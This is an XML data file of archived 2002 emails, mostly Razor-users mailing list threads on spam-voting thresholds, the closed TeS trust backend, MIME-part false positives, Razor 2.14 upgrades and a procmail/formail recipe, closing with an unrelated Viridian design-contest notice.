not everyone knows to go look in the user_prefs file to make those 
changes.-------------------------------------------------------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</si>
  <si>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Tue, 13 Aug 2002, Mike Burger wrote:&gt; On Tue, 13 Aug 2002, David Raistrick wrote:
&gt; 
&gt; &gt; To actually answer Justin's question, (one can assume that he has
&gt; &gt; rewrite_subject and report_header turned on because he wants them..and&gt; I wouldn't make that assumption.  I'd assume that rewrite_subject was on, 
&gt; and report_header was off, because that's the default configuration, and Erps.  I did misword that.  The message (and assumption) was oriented
toward a message that has rewrite_subject on and report_header off...the
default configuration.  For the header removals it contained enough to
also take care of dcc_add_header 1, but not report_header 1.thanks...david---
david raistrick
drais@atlasta.net		http://www.expita.com/nomime.html-------------------------------------------------------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</si>
  <si>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
"Craig R.Hughes" said:&gt; Hmm, tricky because we've got Razor1 and Razor2 rolled into one 
&gt; rule.  Probably should break them out as separate rules anyway 
&gt; so they can get different scores, etc.  Not too hard to do, but 
&gt; it's nearly 11pm so I'll see if I can get to it tomorrow.IMO 2 separate rules is a good idea anyway, razor2 has totally different
hitrates (generally better I think) to razor1.--j.</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 14 Aug 2002, Oates, Isaac wrote:&gt;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times.&gt; By having the server pretend to never have seen it, you can avoid
&gt; people who just re-report spam because it was already marked as spam,
&gt; something that is completely useless.Wrong. razor-check will tell you if a specific piece of mail matches
something already in the database. If you have the system pretend to have
never seen a piece of mail, how do you propose people use the system for
filtering?&gt;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mean?&gt; It means that the revokers have an opinion that probably doesn't mesh
&gt; with the majority;No,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message.&gt; instead of messing with its rating, why not just put
&gt; it on the whitelist?  If I want that ZDNet mail, and most people think
&gt; that ZDNet mail is just plain annoying, then why can't I whitelist it,
&gt; instead of "arguing" with everyone about whether or not it's spam?You always have that ability.&gt; Correct me if I'm wrong, but it's not as if all mail from ZDNet will be
&gt; banned in the future-just that one piece.  So if ZDNet were to change
&gt; its system to make it easier to opt out, or whatever, people would hopefully
&gt;  start unsubscribing instead of clicking the "Spam" button.It's my opinion that it's not my job to unsubscribe to any list that I
haven't subscribed to, nor is it necessarily in my best interest given
that some parties sending unwanted communications may utilize the
unsubscribe request as a method of determining they are mailing a valid
address.&gt; The inherent problem here, of course, is that someone can pretend to be
&gt; 1,000 people and block anything they choose.  But say you still have a
&gt; lightweight trust system built in, where when they "agree" with the
&gt; majority (though they couldn't have known because razor hadn't
&gt; acknowledged anything yet) then your trust rating goes up and vice
&gt; versa.
&gt;
&gt; The key here is that, in order to be reliable, you need the numbers.  What
&gt; am I missing here?See above.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</si>
  <si>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First, 1,000 people will have seen the piece of spam that could've been avoided.  But the other 99,000 will never see that spam.  Evenly distributed, it means that an average user will only see 1% of spam.  That's not realistic, because not everyone will get the same spam, but the basic threshold can be adjusted.  At the very least, 30 people need to "vote" on a given piece of mail to make a realistic decision.  Since there's no "no" vote mechanism (except revocation--and that's after the fact), only a "yes" vote mechanism exists and so if you received 30 "yes" votes then you could safely say that you got a reasonable sample.The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we'll say) have seen the spam, no one else would ever see it.As far as unsubscribing, I'm always leery of clicking on the link (and don't do so unless I specifically remember signing up for something), but the sample population will decide for themselves whether they feel that it's spam.So ultimately, I guess I'm saying that the most effective route would be to use a constantly changing sample pool and just accept that there is some fraction of users that will have to see the spam.  In a system that depends on people deciding whether or not something is spam, is there any other way?Isaac-----Original Message-----
From: Patrick
Sent: Wednesday, August 14, 2002 2:13 PM
To: Oates, Isaac
Cc: razor-users@example.sourceforge.net
Subject: Re: [Razor-users] many vs oneOn Wed, 14 Aug 2002, Oates, Isaac wrote:&gt;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times.&gt; By having the server pretend to never have seen it, you can avoid
&gt; people who just re-report spam because it was already marked as spam,
&gt; something that is completely useless.Wrong. razor-check will tell you if a specific piece of mail matches
something already in the database. If you have the system pretend to have
never seen a piece of mail, how do you propose people use the system for
filtering?&gt;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mean?&gt; It means that the revokers have an opinion that probably doesn't mesh
&gt; with the majority;No,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message.&gt; instead of messing with its rating, why not just put
&gt; it on the whitelist?  If I want that ZDNet mail, and most people think
&gt; that ZDNet mail is just plain annoying, then why can't I whitelist it,
&gt; instead of "arguing" with everyone about whether or not it's spam?You always have that ability.&gt; Correct me if I'm wrong, but it's not as if all mail from ZDNet will be
&gt; banned in the future-just that one piece.  So if ZDNet were to change
&gt; its system to make it easier to opt out, or whatever, people would hopefully
&gt;  start unsubscribing instead of clicking the "Spam" button.It's my opinion that it's not my job to unsubscribe to any list that I
haven't subscribed to, nor is it necessarily in my best interest given
that some parties sending unwanted communications may utilize the
unsubscribe request as a method of determining they are mailing a valid
address.&gt; The inherent problem here, of course, is that someone can pretend to be
&gt; 1,000 people and block anything they choose.  But say you still have a
&gt; lightweight trust system built in, where when they "agree" with the
&gt; majority (though they couldn't have known because razor hadn't
&gt; acknowledged anything yet) then your trust rating goes up and vice
&gt; versa.
&gt;
&gt; The key here is that, in order to be reliable, you need the numbers.  What
&gt; am I missing here?See above.
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                               Patrick Greenwell
         Asking the wrong questions is the leading cause of wrong answers
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/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t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 12 Aug 2002, Vipul Ved Prakash wrote:&gt;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factors.And those would be????Is there a point that you plan on releasing detailed information about
TeS, so we can stop engaging in idle speculation?It's not my desire to second-guess you Vipul(however much my missives may
appear otherwise) or question the hard work you and the other
developers have put into the system, however it seems that every request
for such information has been met with silence.Thanks./\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\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</si>
  <si>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formail did the trick. Thanks to those who answered. For the sake of
archives, here's how to "patch" ricochet:
1. procmailrc (/tmp/pmrc):RICOCHET=/usr/local/etc/ricochet
PMDIR=/tmp
LOGFILE=$PMDIR/pmlog
VERBOSE=yes
MAILDIR=/tmp
LOGABSTRACT=all:0 f
| /usr/local/bin/ri2
2. /usr/local/bin/ri2 (to test):#!/bin/sh
/usr/local/bin/ricochet -DONT_SEND &gt;/tmp/rico.$$3. formmail exec:formail -ds procmail /tmp/pmrc  -----Original Message-----
&gt; From: razor-users-admin@example.sourceforge.net
&gt; [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Sven
&gt; Willenberger
&gt; Sent: Tuesday, August 13, 2002 4:06 PM
&gt; To: zeek@sparklehouse.com
&gt; Cc: razor-users@example.sourceforge.net
&gt; Subject: Re: [Razor-users] Ricochet Question Actually
&gt;
&gt;
&gt;
&gt;
&gt; ----- Original Message -----
&gt; &gt; From: "zeek" 
&gt; &gt; To: 
&gt; &gt; Date: Tue, 13 Aug 2002 12:07:10 -0400
&gt; &gt; Subject: [Razor-users] Ricochet Question Actually
&gt; &gt;
&gt; &gt;
&gt; &gt; Greetings,
&gt; &gt;
&gt; &gt; I've not been able to find a list regarding ricochet (closely related to
&gt; &gt; razor: http://www.vipul.net/ricochet/) so I'm posting here.
&gt; &gt;
&gt; &gt; Every few days I manually go through a spam harvest that Spamassassin
&gt; &gt; collects (by way of checking against osirosoft, razor, et.
&gt; al.). I do this
&gt; &gt; with elm and for each piece of verified spam I pipe it to ricochet which
&gt; &gt; sends it off to the various parties involved (not as accurate
&gt; as I'd like
&gt; &gt; BTW). Needless to mention this is quite tedious and takes a considerable
&gt; &gt; amount of time.
&gt; &gt;
&gt; &gt; My question, which is more of a perl/regexp question, is anyone
&gt; aware of a
&gt; &gt; script that can take an entire mailbox (in proper UNIX mbox format) and
&gt; &gt; handle each piece of mail in it? To clarify, I'm looking for something
&gt; which
&gt; &gt; takes each piece of mail in a mailbox and pipes it to ricochet. This is
&gt; very
&gt; &gt; similar to what razor-report does with the -M option.
&gt; &gt;
&gt;
&gt; Assuming that you have procmail installed you also have its companion
&gt; formail. Formail can be used to parse an mbox into its component
&gt; emails and
&gt; pass them to procmail. Specifiy a procmailrc file to use to
&gt; filter/test/send
&gt; each email and you're good to go. You could even set it up as a cron ...
&gt;
&gt; example: assuming your mailbox/email is "spambox"
&gt;
&gt; `formail -ds procmail /home/spambox/customProcmailrc &lt; /var/mail/spambox`
&gt;
&gt; This will take the mbox /var/mail/spambox break it apart at the message
&gt; separator ('^From '), send it off to procmail and instruct procmail to use
&gt; the "customProcmailrc" config file found in spambox's home directory. That
&gt; "customProcmailrc" would contain your rules for how to handle
&gt; each mail and
&gt; send it where it needs to go ....
&gt;
&gt;
&gt; &gt; Cheers,
&gt; &gt; -zeek
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt; --__--__--
&gt; &gt;
&gt; &gt; Message: 11
&gt; &gt; Date: Tue, 13 Aug 2002 11:58:03 -0500
&gt; &gt; To: razor-users@example.sourceforge.net
&gt; &gt; From: Justin Shore 
&gt; &gt; Subject: [Razor-users] Stripping the SpamAssassin report
&gt; &gt;
&gt; &gt; I'm assuming I need to strip the SpamAssassinReport.txt attachments
&gt; &gt; from my spam mailbox before I run the mailbox through razor-report,
&gt; &gt; correct?  Does anyone know of an easy way to do this?
&gt; &gt;
&gt; &gt; Thanks
&gt; &gt;   Justin
&gt; &gt; --
&gt; &gt;
&gt; &gt; --
&gt; &gt; Justin Shore, ES-SS ES-SSR      Pittsburg State University
&gt; &gt; Network &amp; Systems Manager       Kelce 157Q
&gt; &gt; Office of Information Systems   Pittsburg, KS 66762
&gt; &gt; Voice: (620) 235-4606           Fax: (620) 235-4545
&gt; &gt; http://www.pittstate.edu/ois/
&gt; &gt;
&gt; &gt; Warning:  This message has been quadruple Rot13'ed for your protection.
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt; --__--__--
&gt; &gt;
&gt; &gt; _______________________________________________
&gt; &gt; Razor-users mailing list
&gt; &gt; Razor-users@lists.sourceforge.net
&gt; &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
&gt; &gt;
&gt; &gt;
&gt; &gt; End of Razor-users Digest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</si>
  <si>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Oates, Isaac wrote:
 &gt; First, 1,000 people will have seen the piece of spam that could've
 &gt; been avoided.  But the other 99,000 will never see that spam.  Evenly
 &gt; distributed, it means that an average user will only see 1% of spam.
 &gt; That's not realistic, because not everyone will get the same spam,
 &gt; but the basic threshold can be adjusted.  At the very least, 30
 &gt; people need to "vote" on a given piece of mail to make a realistic
 &gt; decision.  Since there's no "no" vote mechanism (except
 &gt; revocation--and that's after the fact), only a "yes" vote mechanism
 &gt; exists and so if you received 30 "yes" votes then you could safely
 &gt; say that you got a reasonable sample.I'm not sure that I follow your reasoning here. Razor isn't your mail 
server. It doesn't keep in your mail. You don't request your mail there. 
Nor do most people check for spam only when they are going to read their 
mail. My setup check a mail against Razor when my server receives it, 
not when I'm going to read it. If you wait to get 1000 reply for a mail, 
it means you have to wait for 1000 people to read it (at least, some 
people may not vote because they don't want to vote that day or because 
they don't think it's spam). Knowing that about half the planet would be 
sleeping (night time) and thus not reading their mail, it would mean 
that at least 2000 people already received the mail in their inbox. 
Knowing that, among the people who are not sleeping, not all of them are 
constantly reading their mail. I would say that less than 1 people over 
10 read their mail as soon as it arrives. That means that 20,000 people 
already recieved the mail and checked it against the Razor database 
before you would get your 1000 votes.Also, with your system, 99% is the best you could get. If you wait for 
only one vote, maybe only 20 guy would read the mail (1 to vote, 10 
sleeping, and 9 not reading their mail soon enough). Wich gives a value 
99.98%. That's far better than your 99% don't you think.
In RealLife(tm), most likely one guy voting won't be enough but the 
thing is that it will stop the spam as early as possible.Also, if for some reason, this mail is one of those people don't agree 
on whether it is spam or not, it would take a while to revoke those 1000 
reports, which means that some people may lose this legitimate (to them) 
mail.You mentioned that with this system, people will re-report less often. 
First, I don't see how waiting *longer* before making a decision on the 
legitimacy of a mail will reduce re-reporting. The more you wait, the 
more people will get the mail in their inbox, the more people will see 
the mail (again, not everybody check their mail against Razor at read 
time, most do it a reception time using procmail/spamassassin). Second, 
re-reporting has its use, it increase the confidence that a mail is spam.So I don't see what you gain with your 1000 people.	Jehan-------------------------------------------------------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</si>
  <si>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Justin, can SA say "Listed in Razor2" when using Razor2? I get a lot of
reports that are misreports to Razor1 not Razor2.If this is Razor2, then revocation will fix the problem. cheers,
vipul.On Wed, Aug 14, 2002 at 11:56:26AM +0100, Justin Mason wrote:
&gt; 
&gt; As the proud new owner of a free antarc.tk domain ;), I got a confirmation
&gt; mail, which fell into Razor.
&gt; 
&gt; Looks like the fuzzy matching will hit on all confirmation mails until
&gt; it's whitelisted.
&gt; 
&gt; just fyi,
&gt; 
&gt; --j.
&gt; 
&gt; ------- Forwarded Message
&gt; 
&gt; Date:    Wed, 14 Aug 2002 11:37:35 -0000
&gt; From:    support@dot.tk (Dot TK registration center)
&gt; To:      xxxxxx@xxxxx.xxx
&gt; Subject: *****SPAM***** Please confirm your free registration
&gt; 
&gt; SPAM: -------------------- Start SpamAssassin results ----------------------
&gt; SPAM: This mail is probably spam.  The original message has been altered
&gt; SPAM: so you can recognise or block similar unwanted mail in future.
&gt; SPAM: See http://spamassassin.org/tag/ for more details.
&gt; SPAM: 
&gt; SPAM: Content analysis details:   (7.5 hits, 7 required)
&gt; SPAM: SEE_FOR_YOURSELF   (2.8 points)  BODY: See for yourself
&gt; SPAM: SPAM_PHRASE_13_21  (1.5 points)  BODY: Contains phrases frequently found in spam
&gt; SPAM: RAZOR_CHECK        (3.0 points)  Listed in Razor, see http://razor.sourceforge.net/
&gt; SPAM: MSG_ID_ADDED_BY_MTA_3 (0.2 points)  'Message-Id' was added by a relay (3)
&gt; SPAM: 
&gt; SPAM: -------------------- End of SpamAssassin results ---------------------
&gt; 
&gt; 
&gt; Malo ni! 
&gt; and thank you (faka fetai) 
&gt; for registering with Dot TK!
&gt; 
&gt; Your e-mail address : xxxxxxx@xxxxx.xxx
&gt; password: xxxxxxxxx
&gt; 
&gt; confirmation code: xxxxxxx
&gt; (please note: this is not your password)
&gt; 
&gt; As you know we like to keep things simple, so all you need 
&gt; to do to activate your Dot TK address is...
&gt; 
&gt; 1. Go to http://my.dot.tk/cgi-bin/confirm.taloha?tk=xxxxxx
&gt; 
&gt; 2. And enter your confirmation code
&gt; 
&gt; If you have received this email, but did not join us @ Dot TK,
&gt; then somebody tried to register using your e-mail address. 
&gt; 
&gt; You can simply ignore this message... But why not come on in, 
&gt; and see for yourself if your own -free- domain name is still 
&gt; available at http://www.dot.tk
&gt; 
&gt; Any questions? Please visit our feedback page at
&gt; http://www.dot.tk/cgi-bin/response.taloha
&gt; Hope to see you soon at Dot TK.
&gt; 
&gt; Dot TK -- Dividing Domains Differently.
&gt; 
&gt; 
&gt; 
&gt; ------- End of Forwarded Message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Vipul Ved Prakash          |   "The future is here, it's just not 
Software Design Artist     |    widely distributed."
http://vipul.net/          |              -- William Gibson</t>
  </si>
  <si>
    <t>Hmm, tricky because we've got Razor1 and Razor2 rolled into one 
rule.  Probably should break them out as separate rules anyway 
so they can get different scores, etc.  Not too hard to do, but 
it's nearly 11pm so I'll see if I can get to it tomorrow.COn Wednesday, August 14, 2002, at 05:39  PM, Vipul Ved Prakash wrote:&gt; Justin, can SA say "Listed in Razor2" when using Razor2? I get a lot of
&gt; reports that are misreports to Razor1 not Razor2.
&gt;
&gt; If this is Razor2, then revocation will fix the problem.
&gt;
&gt; cheers,
&gt; vipul.
&gt;
&gt; On Wed, Aug 14, 2002 at 11:56:26AM +0100, Justin Mason wrote:
&gt;&gt;
&gt;&gt; As the proud new owner of a free antarc.tk domain ;), I got a 
&gt;&gt; confirmation
&gt;&gt; mail, which fell into Razor.
&gt;&gt;
&gt;&gt; Looks like the fuzzy matching will hit on all confirmation mails until
&gt;&gt; it's whitelisted.
&gt;&gt;
&gt;&gt; just fyi,
&gt;&gt;
&gt;&gt; --j.
&gt;&gt;
&gt;&gt; ------- Forwarded Message
&gt;&gt;
&gt;&gt; Date:    Wed, 14 Aug 2002 11:37:35 -0000
&gt;&gt; From:    support@dot.tk (Dot TK registration center)
&gt;&gt; To:      xxxxxx@xxxxx.xxx
&gt;&gt; Subject: *****SPAM***** Please confirm your free registration
&gt;&gt;
&gt;&gt; SPAM: -------------------- Start SpamAssassin 
&gt;&gt; results ----------------------
&gt;&gt; SPAM: This mail is probably spam.  The original message has 
&gt;&gt; been altered
&gt;&gt; SPAM: so you can recognise or block similar unwanted mail in future.
&gt;&gt; SPAM: See http://spamassassin.org/tag/ for more details.
&gt;&gt; SPAM:
&gt;&gt; SPAM: Content analysis details:   (7.5 hits, 7 required)
&gt;&gt; SPAM: SEE_FOR_YOURSELF   (2.8 points)  BODY: See for yourself
&gt;&gt; SPAM: SPAM_PHRASE_13_21  (1.5 points)  BODY: Contains phrases 
&gt;&gt; frequently found in spam
&gt;&gt; SPAM: RAZOR_CHECK        (3.0 points)  Listed in Razor, see 
&gt;&gt; http://razor.sourceforge.net/
&gt;&gt; SPAM: MSG_ID_ADDED_BY_MTA_3 (0.2 points)  'Message-Id' was 
&gt;&gt; added by a relay (3)
&gt;&gt; SPAM:
&gt;&gt; SPAM: -------------------- End of SpamAssassin 
&gt;&gt; results ---------------------
&gt;&gt;
&gt;&gt;
&gt;&gt; Malo ni!
&gt;&gt; and thank you (faka fetai)
&gt;&gt; for registering with Dot TK!
&gt;&gt;
&gt;&gt; Your e-mail address : xxxxxxx@xxxxx.xxx
&gt;&gt; password: xxxxxxxxx
&gt;&gt;
&gt;&gt; confirmation code: xxxxxxx
&gt;&gt; (please note: this is not your password)
&gt;&gt;
&gt;&gt; As you know we like to keep things simple, so all you need
&gt;&gt; to do to activate your Dot TK address is...
&gt;&gt;
&gt;&gt; 1. Go to http://my.dot.tk/cgi-bin/confirm.taloha?tk=xxxxxx
&gt;&gt;
&gt;&gt; 2. And enter your confirmation code
&gt;&gt;
&gt;&gt; If you have received this email, but did not join us @ Dot TK,
&gt;&gt; then somebody tried to register using your e-mail address.
&gt;&gt;
&gt;&gt; You can simply ignore this message... But why not come on in,
&gt;&gt; and see for yourself if your own -free- domain name is still
&gt;&gt; available at http://www.dot.tk
&gt;&gt;
&gt;&gt; Any questions? Please visit our feedback page at
&gt;&gt; http://www.dot.tk/cgi-bin/response.taloha
&gt;&gt; Hope to see you soon at Dot TK.
&gt;&gt;
&gt;&gt; Dot TK -- Dividing Domains Differently.
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt; ------- End of Forwarded Message
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt; -------------------------------------------------------
&gt;&gt; This sf.net email is sponsored by: Dice - The leading online job board
&gt;&gt; for high-tech professionals. Search and apply for tech jobs today!
&gt;&gt; http://seeker.dice.com/seeker.epl?rel_code=31
&gt;&gt; _______________________________________________
&gt;&gt; Razor-users mailing list
&gt;&gt; Razor-users@lists.sourceforge.net
&gt;&gt; https://lists.sourceforge.net/lists/listinfo/razor-users
&gt;
&gt; --
&gt;
&gt; Vipul Ved Prakash          |   "The future is here, it's just not
&gt; Software Design Artist     |    widely distributed."
&gt; http://vipul.net/          |              -- William Gibson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&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Aug 14, 2002 at 02:47:02PM -0700, Patrick wrote:
&gt; Is there a point that you plan on releasing detailed information about
&gt; TeS, so we can stop engaging in idle speculation?
&gt;
&gt; It's not my desire to second-guess you Vipul (however much my missives
&gt; may appear otherwise) or question the hard work you and the other
&gt; developers have put into the system, however it seems that every request
&gt; for such information has been met with silence.There are no plans for releasing details about TeS. Before the
release of Razor2, I'd pointed out that Razor2 backend (specially
TeS) will be closed.cheers,
vipul.-- Vipul Ved Prakash          |   "The future is here, it's just not 
Software Design Artist     |    widely distributed."
http://vipul.net/          |              -- William Gibson-------------------------------------------------------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</si>
  <si>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Isn't eBays trust the feedback?----- Original Message -----
From: "Chip Paswater" 
To: "Patrick" 
Cc: 
Sent: Wednesday, August 14, 2002 9:51 PM
Subject: Re: [Razor-users] Re: What's wrong with the Razor servers now?
&gt; &gt; &gt; It's not my desire to second-guess you Vipul (however much my missives
&gt; &gt; &gt; may appear otherwise) or question the hard work you and the other
&gt; &gt; &gt; developers have put into the system, however it seems that every
request
&gt; &gt; &gt; for such information has been met with silence.
&gt; &gt;
&gt; &gt; There are no plans for releasing details about TeS. Before the
&gt; &gt; release of Razor2, I'd pointed out that Razor2 backend (specially
&gt; &gt; TeS) will be closed.
&gt;
&gt; Thanks for the clarification. Guess it's time to find something that is
&gt; open.
&gt;
&gt; Good luck.Why do the details of the backend need to be open?I don't think that Ebay publishes it's proprietary trust backend, why
should Razor?-------------------------------------------------------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</si>
  <si>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Wed, 14 Aug 2002, Chip Paswater wrote:&gt; &gt; &gt; &gt; It's not my desire to second-guess you Vipul (however much my missives
&gt; &gt; &gt; &gt; may appear otherwise) or question the hard work you and the other
&gt; &gt; &gt; &gt; developers have put into the system, however it seems that every request
&gt; &gt; &gt; &gt; for such information has been met with silence.
&gt; &gt; &gt;
&gt; &gt; &gt; There are no plans for releasing details about TeS. Before the
&gt; &gt; &gt; release of Razor2, I'd pointed out that Razor2 backend (specially
&gt; &gt; &gt; TeS) will be closed.
&gt; &gt;
&gt; &gt; Thanks for the clarification. Guess it's time to find something that is
&gt; &gt; open.
&gt; &gt;
&gt; &gt; Good luck.
&gt;
&gt; Why do the details of the backend need to be open?
&gt;
&gt; I don't think that Ebay publishes it's proprietary trust backend, why
&gt; should Razor?[last message before I unsub]It's a very poor comparison.There is no question as to what Ebay's trust model is. It's
completely transparent. The ratings and the feedback is there for all to
see. Most importantly it relies on the individual to make the decision for
themselves rather or not to trust a buyer/seller.Contrast this with TeS which utilizes "sooper secret" methodologies to
determine rather or not a submitter is trusted or not and at what point
something becomes spam at some level of "confidence."The unfortunate thing is that in my experience Razor is an incredibly
ineffective filter at this point. The spot checking I've done indicates about
a 40% hit rate. Submissions I made a week ago still don't count as spam,
apparently because I'm not trusted enough, or enough people haven't submitted
the item, or some unknown combination thereof. Why anyone would continue to
waste their time submitting items when they aren't being accepted due to
a series of calculations which will not be shared is beyond me.Any trust model that cannot survive public scrutiny isn't worth trusting IMHO./\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                               Patrick Greenwell
         Asking the wrong questions is the leading cause of wrong answers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</si>
  <si>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 xml:space="preserve">  The way Razor breaks down mail is simple.  If a mail contains MIME
  boundaries it is split on those boundaries, each MIME part is considered 
  when marking the mail as spam.
  In 2.14, there are different 'logic methods' for detecting spam.
  The default method 5 requires all non-contention parts to be spam for
  the mail to be marked as spam.  A part is considered under
  contention if its not clear if its spam are not, and is relatively
  rare.  Sounds like you are not using 2.14, or maybe you're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chadOn 19/08/02 07:41 -0700, Jordan Ritter wrote:
) If I understand you correctly, you should revoke the message en total,
) because this is one of various inputs that TeS uses to understand what
) parts are under contention.  
) 
) As for your question specifically, Chad can answer that (sorry, I
) don't know).
) 
) --jordan
) 
) On Mon, Aug 19, 2002 at 09:14:17AM -0500, Steve Price wrote:
) 
) # Is there an easy way in Razor v2 to turn off detecting a message as
) # SPAM if one of the MIME parts was found in a previous SPAM?  I just
) # received subscribe request to a moderated ecartis list and it was
) # detected as SPAM because it contained an empty text/plain part and
) # an "empty" (to iMail anyway) text/html part.  In reality there were
) # no MIME parts to this message since the body of the email contained
) # instructions from ecartis along with a forwarded copy of the
) # subscribe request which happened to be a multipart MIME message.
) # Sure there were MIME boundaries in the forwarded message but the
) # message as received wasn't a multipart MIME message so Razor should
) # not have detected any of the MIME boundary headers in the body of
) # the forwarded message.  I realized I could whitelist the part that
) # is listed but it would seem that the detection of MIME boundaries
) # should be reserved for messages that actually have multiple MIME
) # parts and not every message that looks like it might.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</si>
  <si>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Mon, Aug 19, 2002 at 10:17:26AM -0700, Chad Norwood wrote:
&gt;   The way Razor breaks down mail is simple.  If a mail contains MIME
&gt;   boundaries it is split on those boundaries, each MIME part is considered 
&gt;   when marking the mail as spam.This isn't a MIME message that it is breaking down though.  The
message as sent to me is just a regular one part, non-MIME message.
The contents of the message among other things is a forwarded message
(inline not as an attachment) that happens to have MIME parts.&gt;   In 2.14, there are different 'logic methods' for detecting spam.
&gt;   The default method 5 requires all non-contention parts to be spam forI see 1-4 documented in the manpage.  2 looked like a good candidate
but the manpage states that only 1, 3, and 4 are on by default.  No
mention of method 5 though that I can see.&gt;   the mail to be marked as spam.  A part is considered under
&gt;   contention if its not clear if its spam are not, and is relatively
&gt;   rare.
&gt; 
&gt;   Sounds like you are not using 2.14, or maybe you're misinterpretingActually I am using 2.14.&gt;   the log files.  Feel free to send me the log files if you think 
&gt;   there is a bug.
&gt;   
&gt;   Also, as jordan says, if you get a legit mail marked as spam (based
&gt;   on whatever MIME stuff is going on), you should revoke it (which sends
&gt;   all parts in) so TeS can take care of business.  I have to run off to a meeting but I'll send you a copy of the logs
and the message that triggered as SPAM when I get back.  I'll also
revoke it along with the other 3 similar messages and the Security
Advisory that were wrongly called SPAM this morning.Thanks.-steve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</si>
  <si>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19/08/02 12:29 -0500, Steve Price wrote:
) On Mon, Aug 19, 2002 at 10:17:26AM -0700, Chad Norwood wrote:
) &gt;   The way Razor breaks down mail is simple.  If a mail contains MIME
) &gt;   boundaries it is split on those boundaries, each MIME part is considered 
) &gt;   when marking the mail as spam.
) 
) This isn't a MIME message that it is breaking down though.  The
) message as sent to me is just a regular one part, non-MIME message.
) The contents of the message among other things is a forwarded message
) (inline not as an attachment) that happens to have MIME parts.  Based on your description the whole thing would be 1 part.  If your mail contains a fwd of a mail *inline* with mime boundaries, 
  then your mail is all consindered to be just text.  If you fwd
  the mail as attachment, the attachment is considered to be a separate
  part  - but the attachment is not broken down further for
  various reasons as mentioned before on this list.
) &gt;   In 2.14, there are different 'logic methods' for detecting spam.
) &gt;   The default method 5 requires all non-contention parts to be spam for
) 
) I see 1-4 documented in the manpage.  2 looked like a good candidate
) but the manpage states that only 1, 3, and 4 are on by default.  No
) mention of method 5 though that I can see.  Its in the source code.  
  You should also see 'method 5' in your debug logs.) &gt;   the log files.  Feel free to send me the log files if you think 
) &gt;   there is a bug.
) 
) I have to run off to a meeting but I'll send you a copy of the logs
) and the message that triggered as SPAM when I get back.  I'll also
) revoke it along with the other 3 similar messages and the Security
) Advisory that were wrongly called SPAM this morning.  ok.  thanks.  -chad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</si>
  <si>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successfully made the leap to Razor 2.14.  I did have a bit of trouble
with Digest::MD5 on Mandrake 8.1 and Mandrake 8.2.  On each platform, I had
to reinstall the original version of Digest::MD5 over top of the Digest::MD5
v2.20 that Razor-SDK installed.  Otherwise, Perl refused to compile a thing.I should have some effectiveness stats on Razor 2 in a few days.  We will
see what % of our corporation's spam it detects.Fox-------------------------------------------------------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</si>
  <si>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--------------------------------------------------------------------------What is MIME?MIME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/rfc/rfc1521.txtAnother source of information is the Internet news group "comp.mail.mime",
which includes a periodic posting of a "Frequently Asked Questions" list.--------------------------------------------------------------------------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</si>
  <si>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I just want to say - RAZOR v2 ROCKS!  Under Razor v1, we were doing good to
detect 20% of our spam with Razor.  I have only had it running since last
night, but it is detecting a whopping 63%!  Of course I would like to see
that number climb higher eventually, but that is a very big improvement!-------------------------------------------------------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</si>
  <si>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Tue, Aug 20, 2002 at 05:47:54PM +0100, Matt Bernstein wrote:
&gt; http://razor.sourceforge.net/docs/whatsnew.html says "Aggregator will be 
&gt; released with the next major release of Razor2 agents." I was told "soon" 
&gt; several months ago--has it stalled, or been released? If the former, can I 
&gt; grab a development snapshot to test for you?
&gt; 
&gt; MattThe aggregator has been pushed back on the priority list because more
important things cropped up. I can't give you an ETA on it, but it's
very much on the TODO list.cheers,
vipul.-- Vipul Ved Prakash          |   "The future is here, it's just not 
Software Design Artist     |    widely distributed."
http://vipul.net/          |              -- William Gibson-------------------------------------------------------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</si>
  <si>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had a problem with extra whitespace being added between textarea tags.
Solved the problem by adding textarea to $INLINE_TAGS= list in
HTMLCleaner.pmHope this might help someone else
Joe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</si>
  <si>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 xml:space="preserve">Key concepts: ubiquitous computation,
emergency relief, Khaki Green, 911.net,
Terrorspace, Cradle.net, Battlespace,
Prosthetic Ubicomp, SO/HO Ubicomp,
Safetyspace, Street.net, Punish.net,
Industrial Ubicomp, UbitopiaAttention Conservation Notice:  It's the
Pope-Emperor blue-skying it at some
computer industry event in Brussels.Links:I was there.
http://www.highgrounddesign.com/design/design.htmAnd then I went to Brussels and delivered this speech.
http://www.ttivanguard.com/And next I'm going here!
http://conferences.oreillynet.com/os2002/And right after that I'm going to another, weirder event
that I can't even tell you about!-------------------------------------------
Entries in the Global Civil Society Design Contest.From: Steven W. Schuldt 
http://www.americanrobotz.com/images2/Soon_GlobalCivilSocietyLaptop.jpgFrom: Ben Davis 
http://www.digitaleverything.com/GlobalComputer.htmFrom: Joerg F. Wittenberger 
http://www.askemos.org/ 
http://www.askemos.org:9080/RomePaper.pdfFrom: Scott Vandehey 
http://spaceninja.com/viridian/notebook.htmlFrom: Bob Morris 
http://viridianrepository.com/GlobalCivil/From: Anonymous
http://home.freiepresse.de/befis/zx2000.html
http://apollo.spaceports.com/~bodo4all/zx/zx97.htm
http://www.vkb.co.il/From: Jim Thompson 
http://www.simputer.org
http://www.cnn.com/2002/TECH/ptech/07/05/india.simputer.reut/index.htmlFrom: Mike Rosing 
http://www.eskimo.com/~eresrch/viridianFrom: till*tillwe.de (Till Westermayer)
Date: Sun Jul 14, 2002  05:38:00 PM US/Central"What do we need for a global civil society notebook? Six design
criteria are highlighted, combined with some rough sketches."http://www.westermayer.de/till/projekte/02gcsdl.htmBest regards,
Till Westermayer - till we *)
http://www.westermayer.de/till/index.htmThis contest expires August 15, 2002. 
